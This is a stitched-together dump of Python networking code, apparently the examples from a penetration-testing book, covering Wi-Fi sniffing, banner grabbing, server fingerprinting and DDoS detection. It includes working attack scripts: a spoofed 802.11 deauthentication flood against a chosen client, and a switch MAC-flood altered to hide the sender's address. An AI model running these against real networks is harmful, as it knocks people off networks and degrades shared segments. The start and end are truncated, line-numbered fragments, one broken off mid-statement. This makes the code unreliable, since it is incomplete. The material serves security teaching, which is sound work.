struct.unpack("!HH16s",tcpheader) 25 | tcp_hdr = struct.unpack("!HH9ss6s",tcpheader) 26 | print "Source Port ", tcp_hdr[0] 27 | print "Destination port ", tcp_hdr[1] 28 | print "Flag ",binascii.hexlify(tcp_hdr[3]) 29 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /Module 2/Chapter 3/Chapter 3/str1.py: -------------------------------------------------------------------------------- 1 | import struct 2 | ms= struct.pack('hhl', 1, 2, 3) 3 | print (ms) 4 | k= struct.unpack('hhl',ms) 5 | print k 6 | -------------------------------------------------------------------------------- /Module 2/Chapter 3/Chapter 3/struct1.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import struct 3 | 4 | host = "192.168.0.1" 5 | port = 12347 6 | 7 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 8 | s.bind((host, port)) 9 | s.listen(1) 10 | conn, addr = s.accept() 11 | print "connected by", addr 12 | 13 | msz= struct.pack('hhl', 1, 2, 3) 14 | 15 | conn.send(msz) 16 | conn.close() 
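# ------------------------------------------------------------------------------
# /Module 2/Chapter 4/Chapter 4/deauth.py
# ------------------------------------------------------------------------------
"""Flood one Wi-Fi client with 802.11 deauthentication frames.

Run this only against an AP and client you are authorised to test: it knocks
the victim off the network for as long as the burst lasts.  Networks using
802.11w (protected management frames) discard unprotected deauth frames, so a
silent failure there is expected.  The interface must already be in monitor
mode (the book uses ``mon0``).
"""
import re
import sys

from scapy.all import Dot11, Dot11Deauth, RadioTap, sendp

try:
    _ask = raw_input          # Python 2
except NameError:             # Python 3
    _ask = input

interface = "mon0"
# Colon- or dash-separated hex pairs, e.g. 00:11:22:aa:bb:cc.
_MAC_RE = re.compile(r"^([0-9A-Fa-f]{2}[:-]){5}[0-9A-Fa-f]{2}$")


def read_mac(prompt):
    """Prompt for a MAC address and validate it up front.

    A typo otherwise surfaces as an obscure scapy error while the frame is
    being built; exiting with the offending value is far clearer.
    """
    value = _ask(prompt).strip()
    if not _MAC_RE.match(value):
        sys.exit("Not a MAC address: %r" % value)
    return value.lower()


def main(iface=interface, count=1000, inter=0.1):
    """Prompt for the AP and victim MACs, then send *count* deauth frames."""
    bssid = read_mac("Enter the MAC of AP ")
    victim_mac = read_mac("Enter the MAC of Victim ")
    # addr1 = receiver (the victim); addr2 = transmitter and addr3 = BSSID are
    # both set to the AP so the client believes its own AP sent the deauth.
    frame = RadioTap() / Dot11(addr1=victim_mac, addr2=bssid, addr3=bssid) / Dot11Deauth()
    sendp(frame, iface=iface, count=count, inter=inter)


if __name__ == "__main__":
    # Optional override of the monitor interface: deauth.py [iface]
    main(sys.argv[1] if len(sys.argv) > 1 else interface)


# ------------------------------------------------------------------------------
# /Module 2/Chapter 4/Chapter 4/first_ssid_sniffer.py
# ------------------------------------------------------------------------------
"""List nearby access points from raw beacon frames (no scapy).

Reads raw 802.11 frames from a monitor-mode interface and prints the SSID,
BSSID and channel of every AP the first time one of its beacons is seen.
Needs root (raw sockets) and Linux (AF_PACKET).

The original hard-coded a 26-byte radiotap header and assumed the DS
Parameter Set sat at a fixed distance after the SSID; both vary by driver
and by AP, which yields garbage or IndexError.  Here the radiotap length is
read from the header and the information elements are walked properly.
"""
import binascii
import socket
import struct

INTERFACE = "mon0"
ETH_P_ALL = 0x0003
BEACON_FC = 0x80          # frame-control byte: type 0 (management), subtype 8 (beacon)
MGMT_HDR_LEN = 24         # FC(2) duration(2) addr1(6) addr2(6) addr3(6) seq(2)
BEACON_FIXED_LEN = 12     # timestamp(8) beacon interval(2) capabilities(2)
TAG_SSID = 0
TAG_DS_PARAMS = 3         # DS Parameter Set: a single byte holding the channel


def radiotap_length(frame):
    """Return the radiotap header length, or None if the frame is too short.

    The length is a little-endian u16 at offset 2 and differs between drivers,
    so it must be read rather than assumed.
    """
    if len(frame) < 4:
        return None
    return struct.unpack_from("<H", frame, 2)[0]


def tagged_params(body):
    """Yield (tag, value) for each information element in a beacon body."""
    pos = 0
    while pos + 2 <= len(body):
        tag, length = body[pos], body[pos + 1]
        value = body[pos + 2:pos + 2 + length]
        if len(value) < length:   # truncated element: stop instead of misparsing
            return
        yield tag, value
        pos += 2 + length


def parse_beacon(frame):
    """Return (bssid_hex, ssid, channel) for a beacon frame, else None.

    *channel* is None when the beacon carries no DS Parameter Set (common on
    5 GHz) and *ssid* is "" for hidden networks.
    """
    frame = bytearray(frame)
    rt_len = radiotap_length(frame)
    if rt_len is None or len(frame) < rt_len + MGMT_HDR_LEN + BEACON_FIXED_LEN:
        return None
    mgmt = frame[rt_len:]
    if mgmt[0] != BEACON_FC:
        return None
    # addr2 (transmitter) is what the original printed; for a beacon it is the AP.
    bssid = binascii.hexlify(bytes(mgmt[10:16])).decode("ascii")
    ssid, channel = "", None
    for tag, value in tagged_params(mgmt[MGMT_HDR_LEN + BEACON_FIXED_LEN:]):
        if tag == TAG_SSID:
            ssid = bytes(value).decode("utf-8", "replace")
        elif tag == TAG_DS_PARAMS and value:
            channel = value[0]
    return bssid, ssid, channel


def main(iface=INTERFACE):
    """Sniff forever, printing each AP once."""
    # AF_PACKET takes the protocol in network byte order, hence htons().  The
    # original passed a bare 3 to socket(); that only worked because bind()
    # converts its own protocol argument and re-registers the hook.
    sniffer = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ALL))
    sniffer.bind((iface, ETH_P_ALL))
    seen = set()
    try:
        while True:
            parsed = parse_beacon(sniffer.recvfrom(6000)[0])
            if parsed is None or parsed[0] in seen:
                continue
            seen.add(parsed[0])
            print("SSID ->  %s -- BSSID ->  %s -- Channel ->  %s"
                  % (parsed[1], parsed[0], parsed[2]))
    finally:
        sniffer.close()


if __name__ == "__main__":
    main()


# ------------------------------------------------------------------------------
# /Module 2/Chapter 4/Chapter 4/mac_d.py
# ------------------------------------------------------------------------------
"""Detect deauthentication frames on a monitor-mode interface.

A burst of deauths is the signature of a deauth attack (see deauth.py).  Each
hit is printed with both addresses and the reason code so the alert says who
is being kicked and by whom — bearing in mind that addr2 can be spoofed.
"""
from scapy.all import Dot11Deauth, sniff

interface = "mon0"
i = 1   # running counter, kept as the module global the original used


def info(fm):
    """sniff() callback: report each 802.11 deauth (type 0, subtype 12)."""
    global i
    if not fm.haslayer(Dot11Deauth):
        return
    print("Deauth detected  %d  %s -> %s  reason=%s"
          % (i, fm.addr2, fm.addr1, fm[Dot11Deauth].reason))
    i += 1


if __name__ == "__main__":
    sniff(iface=interface, prn=info)


# ------------------------------------------------------------------------------
# /Module 2/Chapter 4/Chapter 4/mac_flood.py
# ------------------------------------------------------------------------------
"""MAC-flood a switch: broadcast ARP frames from random source MACs.

Every frame carries a different source MAC so the switch's CAM table fills
and (on many switches) it falls back to hub-like flooding.  Lab use only —
this degrades the segment for everyone on it.
"""
import sys

from scapy.all import ARP, Ether, RandMAC, sendp

try:
    _ask = raw_input          # Python 2
except NameError:             # Python 3
    _ask = input

BROADCAST = "ff:ff:ff:ff:ff:ff"
TARGET = "192.168.1.255"      # any address on the segment does; the CAM table is the goal


def build_frames(num, target=TARGET):
    """Return *num* broadcast ARP requests, each from a fresh random MAC.

    The same random MAC goes into both the Ethernet source and the ARP sender
    field.  The original left hwsrc at the interface's real MAC, which leaks
    the attacker's address in every frame and makes the flood trivial to
    filter on.
    """
    frames = []
    for _ in range(num):
        mac = str(RandMAC())
        frames.append(Ether(src=mac, dst=BROADCAST)
                      / ARP(hwsrc=mac, pdst=target, hwdst=BROADCAST))
    return frames


def main():
    """Prompt for the count and interface, then send the flood."""
    try:
        num = int(_ask("Enter the number of packets "))
    except ValueError:
        sys.exit("Packet count must be an integer")
    if num <= 0:
        sys.exit("Packet count must be positive")
    interface = _ask("Enter the Interface ").strip()
    try:
        sendp(build_frames(num), iface=interface, inter=0.001)
    except (IOError, OSError) as err:
        # Bad interface name, no root, link down: report the real cause rather
        # than the original's bare except + "Destination Unreachable".
        sys.exit("Failed to send on %s: %s" % (interface, err))


if __name__ == "__main__":
    main()


# ------------------------------------------------------------------------------
# /Module 2/Chapter 4/Chapter 4/probe_req.py
# ------------------------------------------------------------------------------
"""Report clients that probe for a given SSID.

Stations broadcast probe requests for networks they remember; watching for a
particular SSID reveals which client MACs know it (the starting point for an
evil-twin attack, and a privacy leak worth demonstrating).
"""
from scapy.all import Dot11ProbeReq, sniff

try:
    _ask = raw_input          # Python 2
except NameError:             # Python 3
    _ask = input

interface = "mon0"
probe_req = set()      # client MACs already reported
ap_name = ""           # SSID to watch for, filled in by main()


def _ssid_text(fm):
    """Return the probed SSID as text (scapy hands back bytes on Python 3)."""
    ssid = fm.info
    if not isinstance(ssid, str):
        ssid = ssid.decode("utf-8", "replace")
    return ssid


def probesniff(fm):
    """sniff() callback: print each new client MAC probing for ap_name."""
    if not fm.haslayer(Dot11ProbeReq):
        return
    client_name = _ssid_text(fm)
    # An empty ap_name matches every wildcard probe; that is the caller's choice.
    if client_name == ap_name and fm.addr2 not in probe_req:
        probe_req.add(fm.addr2)
        print("New Probe Request:  %s" % client_name)
        print("MAC  %s" % fm.addr2)


def main():
    global ap_name
    ap_name = _ask("Please enter the AP name ")
    sniff(iface=interface, prn=probesniff)


if __name__ == "__main__":
    main()


# ------------------------------------------------------------------------------
# /Module 2/Chapter 4/Chapter 4/scapy_ssid.py
# ------------------------------------------------------------------------------
"""List access points with scapy: SSID, BSSID and channel from beacons."""
from scapy.all import Dot11Beacon, Dot11Elt, sniff

interface = "mon0"
ap_list = set()


def find_elt(fm, elt_id):
    """Return the first Dot11Elt with *elt_id* (0 = SSID, 3 = DS params), or None.

    The original used ``fm[Dot11Elt:3]`` — the third element by position.
    Element order is not fixed and 5 GHz beacons often omit the DS Parameter
    Set, so that raised inside the callback and killed the sniffer.
    """
    elt = fm.getlayer(Dot11Elt)
    while elt is not None:
        if elt.ID == elt_id:
            return elt
        elt = elt.payload.getlayer(Dot11Elt)
    return None


def info(fm):
    """sniff() callback: print each AP the first time a beacon is seen."""
    if not fm.haslayer(Dot11Beacon) or fm.addr2 in ap_list:
        return
    ap_list.add(fm.addr2)
    ssid_elt = find_elt(fm, 0)
    ssid = bytes(ssid_elt.info).decode("utf-8", "replace") if ssid_elt is not None else ""
    ds_elt = find_elt(fm, 3)
    channel = bytearray(ds_elt.info)[0] if ds_elt is not None and ds_elt.info else None
    print("SSID-->  %s -- BSSID -->  %s -- Channel-->  %s" % (ssid, fm.addr2, channel))


if __name__ == "__main__":
    sniff(iface=interface, prn=info)


# ------------------------------------------------------------------------------
# /Module 2/Chapter 4/Chapter 4/ssid.py
# ------------------------------------------------------------------------------
"""List access points with scapy: SSID and BSSID from beacon frames."""
from scapy.all import Dot11Beacon, Dot11Elt, sniff

interface = "mon0"
ap_list = set()


def info(fm):
    """sniff() callback: print each AP the first time a beacon is seen."""
    if not fm.haslayer(Dot11Beacon) or fm.addr2 in ap_list:
        return
    ap_list.add(fm.addr2)
    # fm.info resolves to the first element, which need not be the SSID;
    # look for element ID 0 explicitly and tolerate beacons without one.
    elt = fm.getlayer(Dot11Elt)
    while elt is not None and elt.ID != 0:
        elt = elt.payload.getlayer(Dot11Elt)
    ssid = bytes(elt.info).decode("utf-8", "replace") if elt is not None else ""
    print("SSID-->  %s -- BSSID -->  %s" % (ssid, fm.addr2))


if __name__ == "__main__":
    sniff(iface=interface, prn=info)


# ------------------------------------------------------------------------------
# /Module 2/Chapter 5/Programs/banner.py
# ------------------------------------------------------------------------------
"""Print the payload of TCP segments seen on the wire (crude banner grabbing).

Parses the IP and TCP header lengths instead of assuming a fixed 54-byte
Ethernet+IP+TCP header: TCP options (timestamps, SACK) are the norm on modern
stacks, so the original printed option bytes ahead of every banner, and it
also dumped UDP/ICMP packets and empty ACKs as if they were banners.
Needs root and Linux (PF_PACKET).
"""
import socket
import struct

ETH_P_IP = 0x0800
ETH_HDR_LEN = 14
IPPROTO_TCP = 6
BANNER_LIMIT = 479   # the original printed bytes 54..533 of the frame


def tcp_payload(frame):
    """Return the TCP payload of an Ethernet/IPv4 frame, or None.

    None means the frame is not IPv4/TCP, is too short to parse, or carries
    no data.  Ethernet trailer padding is dropped via the IP total length.
    """
    frame = bytearray(frame)
    ip_off = ETH_HDR_LEN
    if len(frame) < ip_off + 20 or frame[ip_off] >> 4 != 4:
        return None
    ihl = (frame[ip_off] & 0x0F) * 4                 # IP header incl. options
    if ihl < 20 or frame[ip_off + 9] != IPPROTO_TCP:
        return None
    total_len = struct.unpack_from("!H", frame, ip_off + 2)[0]
    tcp_off = ip_off + ihl
    if len(frame) < tcp_off + 20:
        return None
    data_off = (frame[tcp_off + 12] >> 4) * 4        # TCP header incl. options
    start = tcp_off + data_off
    end = min(len(frame), ip_off + total_len)
    if start >= end:
        return None
    return bytes(frame[start:end])


def main():
    """Sniff IPv4 frames forever, printing each TCP payload."""
    s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(ETH_P_IP))
    try:
        while True:
            banner = tcp_payload(s.recvfrom(2048)[0])
            if not banner:
                continue
            print(banner[:BANNER_LIMIT])
            print("--" * 40)
    finally:
        s.close()


if __name__ == "__main__":
    main()


# ------------------------------------------------------------------------------
# /Module 2/Chapter 5/Programs/div.py
# ------------------------------------------------------------------------------
"""Fetch hackthissite.org and print its ``<div id="notice">``."""
from bs4 import BeautifulSoup

try:                          # Python 2
    from urllib2 import urlopen
except ImportError:           # Python 3
    from urllib.request import urlopen

url = "https://www.hackthissite.org"


def fetch_notice(target=url, timeout=10):
    """Return the notice div (a bs4 Tag) or None if the page has none."""
    response = urlopen(target, timeout=timeout)
    try:
        html_page = response.read()
    finally:
        response.close()
    # Name the parser: otherwise bs4 picks whichever library is installed, so
    # results differ between machines (and recent bs4 warns about it).
    return BeautifulSoup(html_page, "html.parser").find("div", id="notice")


if __name__ == "__main__":
    print(fetch_notice())


# ------------------------------------------------------------------------------
# /Module 2/Chapter 5/Programs/header.py
# ------------------------------------------------------------------------------
"""Print the status and response headers for a URL (server fingerprinting).

Headers are printed for every status, not only 200: a 301/403/500 carries
the same Server / X-Powered-By fingerprint.  Only http(s) URLs are accepted;
urllib would happily open file:// or ftp:// for an unchecked input.  Note
that redirects are followed, so the headers shown belong to the final URL.
"""
import sys

try:                          # Python 2
    from urllib2 import HTTPError, urlopen
    from urlparse import urlparse
except ImportError:           # Python 3
    from urllib.error import HTTPError
    from urllib.parse import urlparse
    from urllib.request import urlopen

try:
    _ask = raw_input          # Python 2
except NameError:             # Python 3
    _ask = input


def fetch(url, timeout=10):
    """Open *url* and return the response object, even for 4xx/5xx."""
    if urlparse(url).scheme not in ("http", "https"):
        sys.exit("Only http:// and https:// URLs are supported: %r" % url)
    try:
        return urlopen(url, timeout=timeout)
    except HTTPError as err:   # has .code and .headers just like a response
        return err


def main():
    url1 = _ask("Enter the URL ").strip()
    http_r = fetch(url1)
    try:
        print("HTTP %s" % http_r.code)
        print(http_r.headers)
    finally:
        http_r.close()


if __name__ == "__main__":
    main()


# ------------------------------------------------------------------------------
# /Module 2/Chapter 5/Programs/info.py
# ------------------------------------------------------------------------------
"""Provoke a 404 and inspect the server's default error page.

One random letter is appended to the URL so the request is almost certainly
for a missing resource; the response is then searched for an ``<address>``
element, where Apache's stock error page prints the server version and port.
The 404 body is appended to result.txt.

Fixes over the original: the regex ``<*address>`` meant "zero or more '<'
then 'address>'" and only worked by accident; any status other than 404/200
looped forever; result.txt was never closed.
"""
import io
import random
import re
import sys

try:                          # Python 2
    from urllib2 import HTTPError, urlopen
    from urlparse import urlparse
except ImportError:           # Python 3
    from urllib.error import HTTPError
    from urllib.parse import urlparse
    from urllib.request import urlopen

try:
    _ask = raw_input          # Python 2
except NameError:             # Python 3
    _ask = input

_ADDRESS_RE = re.compile(r"<address>(.*?)</address>", re.IGNORECASE | re.DOTALL)


def extract_address(content):
    """Return the text inside the first <address> element, or None."""
    match = _ADDRESS_RE.search(content)
    return match.group(1) if match else None


def fetch(url, timeout=10):
    """Return (status_code, body_text); 4xx/5xx are returned, not raised."""
    if urlparse(url).scheme not in ("http", "https"):
        sys.exit("Only http:// and https:// URLs are supported: %r" % url)
    try:
        response = urlopen(url, timeout=timeout)
    except HTTPError as err:
        response = err
    try:
        return response.code, response.read().decode("utf-8", "replace")
    finally:
        response.close()


def main():
    url1 = _ask("Enter the URL ").strip()
    url2 = url1 + chr(random.randint(97, 122))   # one random lowercase letter
    code, content = fetch(url2)

    if code == 404:
        with io.open("result.txt", "a", encoding="utf-8") as file_text:
            file_text.write(u"--------------" + url1 + u"--------------\n")
            file_text.write(content)
        print(content)
        address = extract_address(content)
        if address is not None:
            print("Coding is not good")
            print(address)
        else:
            print("error handling seems ok")
    elif code == 200:
        print("Web page is using custome Error page")
    else:
        print("Unexpected HTTP status %s" % code)


if __name__ == "__main__":
    main()


# ------------------------------------------------------------------------------
# /Module 2/Chapter 5/Programs/par3.py
# ------------------------------------------------------------------------------
"""Print a page's title and every href on it."""
import sys

from bs4 import BeautifulSoup

try:                          # Python 2
    from urllib2 import urlopen
    from urlparse import urlparse
except ImportError:           # Python 3
    from urllib.parse import urlparse
    from urllib.request import urlopen

try:
    _ask = raw_input          # Python 2
except NameError:             # Python 3
    _ask = input


def links_of(b_object):
    """Return the href of every <a> in the soup (None for anchors without one)."""
    return [link.get("href") for link in b_object.find_all("a")]


def main():
    url = _ask("Enter the URL ").strip()
    if urlparse(url).scheme not in ("http", "https"):
        sys.exit("Only http:// and https:// URLs are supported: %r" % url)
    ht = urlopen(url, timeout=10)
    try:
        html_page = ht.read()
    finally:
        ht.close()
    b_object = BeautifulSoup(html_page, "html.parser")
    print(b_object.title)
    # A page without <title> made the original raise AttributeError here.
    print(b_object.title.text if b_object.title is not None else "")
    for href in links_of(b_object):
        print(href)


if __name__ == "__main__":
    main()


# ------------------------------------------------------------------------------
# /Module 2/Chapter 5/Programs/whois.py
# ------------------------------------------------------------------------------
"""Look up a domain on smartwhois.com and save the start of the record.

The domain is sent to a third-party site; it is URL-encoded so a crafted
input cannot alter the request path.  The first 17 lines from "Domain Name:"
are printed and appended to who.txt.
"""
import io
import sys

from bs4 import BeautifulSoup

try:                          # Python 2
    from urllib import quote
    from urllib2 import urlopen
except ImportError:           # Python 3
    from urllib.parse import quote
    from urllib.request import urlopen

try:
    _ask = raw_input          # Python 2
except NameError:             # Python 3
    _ask = input

LINES_TO_KEEP = 17
START_MARKER = "Domain Name:"


def whois_lines(html_page):
    """Return up to LINES_TO_KEEP record lines starting at the last
    "Domain Name:" (the original kept the offset of the last match), or []
    when the page has no whois div or no marker.

    NOTE(review): the original split str(who_is) on an empty separator,
    which raises ValueError; the separator was presumably lost when the
    listing was flattened.  Splitting the element's text on newlines is the
    closest working reading — confirm against the live page.
    """
    who_is = BeautifulSoup(html_page, "html.parser").find("div", attrs={"class": "whois"})
    if who_is is None:
        return []
    text = who_is.get_text("\n")
    start = text.rfind(START_MARKER)
    if start < 0:
        return []
    return text[start:].splitlines()[:LINES_TO_KEEP]


def main():
    domain = _ask("Enter the domain name ").strip()
    url = "http://smartwhois.com/whois/" + quote(domain, safe="")
    ht = urlopen(url, timeout=10)
    try:
        html_page = ht.read()
    finally:
        ht.close()
    lines = whois_lines(html_page)
    if not lines:
        sys.exit("No whois record found for %s" % domain)
    with io.open("who.txt", "a", encoding="utf-8") as file_text:
        for line in lines:
            file_text.write(line + u"\n")
            print(line)
        file_text.write(u"-" * 50 + u"\n")


if __name__ == "__main__":
    main()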
33 | 34 | 35 | 36 | 37 | 38 | -------------------------------------------------------------------------------- /Module 2/Chapter 6/Programs/DDOS_detect1.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import struct 3 | from datetime import datetime 4 | s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8) 5 | dict = {} 6 | file_txt = open("dos.txt",'a') 7 | file_txt.writelines("**********") 8 | t1= str(datetime.now()) 9 | file_txt.writelines(t1) 10 | file_txt.writelines("**********") 11 | file_txt.writelines("\n") 12 | print "Detection Start ......." 13 | D_val =10 14 | D_val1 = D_val+10 15 | while True: 16 | 17 | pkt = s.recvfrom(2048) 18 | ipheader = pkt[0][14:34] 19 | ip_hdr = struct.unpack("!8sB3s4s4s",ipheader) 20 | IP = socket.inet_ntoa(ip_hdr[3]) 21 | print "Source IP", IP 22 | if dict.has_key(IP): 23 | dict[IP]=dict[IP]+1 24 | print dict[IP] 25 | if(dict[IP]>D_val) and (dict[IP] 2 | 3 | 4 | 5 | 6 | 7 | THis is Comment page Enter your views mohitLOGOUT 8 | 9 | 10 | 11 | 12 | Leave your Comments 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Comments 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | Old comments 40 | 41 | 42 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 |
6 | 7 | THis is Comment page Enter your views
22 | Comments